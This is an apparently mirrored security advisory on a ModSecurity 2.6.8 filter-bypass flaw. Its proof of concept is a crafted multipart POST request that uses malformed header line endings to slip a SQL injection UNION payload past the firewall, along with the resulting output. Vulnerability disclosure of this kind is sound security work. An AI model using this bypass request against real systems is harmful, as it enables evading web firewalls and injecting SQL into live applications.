40 lines
858 B
Text
Executable file
40 lines
858 B
Text
Executable file
source: http://www.securityfocus.com/bid/56096/info
|
|
|
|
ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.
|
|
|
|
ModSecurity 2.6.8 is vulnerable; other versions may also be affected.
|
|
|
|
Proof of concept:
|
|
-----------------
|
|
|
|
wut.php:
|
|
--------
|
|
|
|
<? echo $POST[xxx] ?>
|
|
|
|
|
|
POST request:
|
|
-------------
|
|
|
|
POST /wut.php HTTP/1.1
|
|
Content-Type: multipart/form-data; boundary=A
|
|
Content-Length: 161
|
|
|
|
--A
|
|
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
|
|
--A
|
|
Content-Disposition: form-data; name="yyy"; filename="z"
|
|
|
|
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
|
|
|
|
--A--
|
|
|
|
|
|
Output:
|
|
-------
|
|
|
|
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
|
|
|
|
(any change in the header should produce a 403)d
|